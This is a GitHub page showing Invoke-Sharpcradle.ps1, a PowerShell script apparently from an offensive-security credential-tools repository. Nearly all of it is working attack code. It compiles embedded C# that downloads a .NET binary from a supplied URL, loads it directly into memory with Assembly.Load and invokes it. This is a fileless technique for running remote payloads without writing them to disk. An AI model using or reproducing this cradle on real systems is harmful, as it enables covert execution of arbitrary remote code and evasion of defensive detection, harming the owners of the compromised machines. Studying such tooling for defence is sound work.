forked from S3cur3Th1sSh1t/Creds
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Invoke-Sharpcradle.ps1
109 lines (93 loc) · 2.7 KB
/
Invoke-Sharpcradle.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
function Invoke-Sharpcradle
{
<#
.DESCRIPTION
Download .NET Binary to RAM.
Credits to https://github.com/anthemtotheego for Sharpcradle in C#
Author: @securethisshit
License: BSD 3-Clause
#>
Param
(
[string]
$uri,
[string]
$argument1,
[string]
$argument2,
[string]
$argument3
)
$cradle = @"
using System;
using System.IO;
using System.Linq;
using System.Net;
using System.Reflection;
namespace SharpCradle
{
public class Program
{
public static void Main(params string[] args)
{
try
{
string url = args[0];
object[] cmd = args.Skip(1).ToArray();
MemoryStream ms = new MemoryStream();
using (WebClient client = new WebClient())
{
//Access web and read the bytes from the binary file
System.Net.ServicePointManager.SecurityProtocol = System.Net.SecurityProtocolType.Tls | System.Net.SecurityProtocolType.Tls11 | System.Net.SecurityProtocolType.Tls12;
ms = new MemoryStream(client.DownloadData(url));
BinaryReader br = new BinaryReader(ms);
byte[] bin = br.ReadBytes(Convert.ToInt32(ms.Length));
ms.Close();
br.Close();
loadAssembly(bin, cmd);
}
}//End try
catch
{
Console.WriteLine("Something went wrong! Check parameters and make sure binary uses managed code");
}//End catch
}//End Main
//loadAssembly
public static void loadAssembly(byte[] bin, object[] commands)
{
Assembly a = Assembly.Load(bin);
try
{
a.EntryPoint.Invoke(null, new object[] { commands });
}
catch
{
MethodInfo method = a.EntryPoint;
if (method != null)
{
object o = a.CreateInstance(method.Name);
method.Invoke(o, null);
}
}//End try/catch
}//End loadAssembly
}
}
"@
Add-Type -TypeDefinition $cradle -Language CSharp
if ($argument1 -and $argument2 -and $argument3)
{
[SharpCradle.Program]::Main("$uri", "$argument1", "$argument2", "$argument3")
}
elseif ($argument1 -and $argument2)
{
[SharpCradle.Program]::Main("$uri", "$argument1", "$argument2")
}
elseif ($argument1)
{
[SharpCradle.Program]::Main("$uri", "$argument1")
}
else
{
[SharpCradle.Program]::Main("$uri")
}
}